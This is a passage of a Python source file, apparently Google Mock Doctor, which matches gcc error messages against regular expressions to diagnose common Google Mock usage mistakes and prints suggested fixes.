This version works when the type is used as the mock function's return
type.
"""
gcc_4_3_1_regex = (
r'In member function \'int .*\n' + _FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex = (
r'error: a function call cannot appear in a constant-expression'
+ _FILE_LINE_RE + r'error: template argument 1 is invalid\n')
diagnosis = _TTB_DIAGNOSIS % {'type': 'Foo'}
return (list(_GenericDiagnoser('TTB', 'Type in Template Base',
gcc_4_3_1_regex, diagnosis, msg)) +
list(_GenericDiagnoser('TTB', 'Type in Template Base',
gcc_4_4_0_regex, diagnosis, msg)))
def _TypeInTemplatedBaseDiagnoser2(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
This version works when the type is used as the mock function's sole
parameter type.
"""
regex = (_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
return _GenericDiagnoser('TTB', 'Type in Template Base',
regex, _TTB_DIAGNOSIS, msg)
def _TypeInTemplatedBaseDiagnoser3(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
This version works when the type is used as a parameter of a mock
function that has multiple parameters.
"""
regex = (r'error: expected `;\' before \'::\' token\n'
+ _FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
return _GenericDiagnoser('TTB', 'Type in Template Base',
regex, _TTB_DIAGNOSIS, msg)
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
regex, diagnosis, msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
diagnosis = """
The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
regex, diagnosis, msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser1,
_OverloadedMethodActionDiagnoser2,
_TypeInTemplatedBaseDiagnoser1,
_TypeInTemplatedBaseDiagnoser2,
_TypeInTemplatedBaseDiagnoser3,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the gcc error message."""
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
      if diagnosis not in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
    print ('Please copy and paste the compiler errors here. Press Ctrl-D when '
'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print '\nGcc complained:'
print '8<------------------------------------------------------------'
print msg
print '------------------------------------------------------------>8'
print """
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and gcc's error messages to
googlemock@googlegroups.com, you can be helped and I can get smarter --
win-win for us!"""
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print """
How did I do? If you think I'm wrong or unhelpful, please send your
source code and gcc's error messages to googlemock@googlegroups.com. Then
you can be helped and I can get smarter -- I promise I won't be upset!"""
if __name__ == '__main__':
main()
|
apache-2.0
|